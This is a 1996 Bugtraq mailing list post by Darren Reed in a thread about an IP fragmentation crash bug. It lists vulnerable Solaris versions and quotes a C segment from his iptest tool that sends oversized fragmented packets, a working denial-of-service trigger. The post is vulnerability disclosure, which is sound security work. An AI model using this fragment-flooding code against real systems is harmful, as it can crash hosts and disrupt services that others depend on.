Bugtraq mailing list archives
Re: Urgent !! Serious Linux Security Bug....
From: avalon () coombs anu edu au (Darren Reed)
Date: Tue, 22 Oct 1996 23:44:06 +1000
Solaris2 was, I believe, vulnerable to this bug too.
From the "Crashable" file for iptest:
Solaris 2.4 - upto and including 101945-34, > 34 ?
Solaris 2.5 - 11/95
(Yes, I stumbled upon this about the same time last year, but don't exactly
have the time or resources to check everything under the sun, especially
new operating systems...)
For those with it handly, "iptest -1 -p 8".
but I built in some random lossage which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course), is at max. 64k in size.
However, it doesn't try to send an ICMP packet, the following segment of
code is what triggeres it:
if (!ptest || (ptest == 8)) {
struct timeval tv;
gettimeofday(&tv, NULL);
srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
/*
* Part8: 63k packet + 1k fragment at offset 0x1ffe
*/
ip->ip_off = IP_MF;
u->uh_dport = htons(9);
ip->ip_id = htons(id++);
printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
ip->ip_len = 768 + 20 + 8;
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip 0\n");
ip->ip_len = MIN(768 + 20, mtu - 68);
i = 512;
for (; i < (63 * 1024 + 768); i += 768) {
ip->ip_off = IP_MF | (i >> 3);
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip\n");
putchar('\n');
fflush(stdout);
}
Don't work against any system using a BSD based IP networking code.
Darren
Current thread:
- /usr/bin/solstice under solaris 5.5 Grant Kaufmann (Oct 18)
- Re: /usr/bin/solstice under solaris 5.5 Casper Dik (Oct 19)
- Urgent !! Serious Linux Security Bug.... Jake the Prince (Oct 19)
- Re: Urgent !! Serious Linux Security Bug.... The Cowzilla Man (Oct 19)
- Re: Urgent !! Serious Linux Security Bug.... TriumpH (Oct 20)
- Ping Crashes Erik Fichtner (Oct 22)
- Re: Urgent !! Serious Linux Security Bug.... Kim Alm (Oct 22)
- Re: Urgent !! Serious Linux Security Bug.... Darren Reed (Oct 22)
- <Possible follow-ups>
- /usr/bin/solstice under solaris 5.5 Scriptors of DOOM (Oct 18)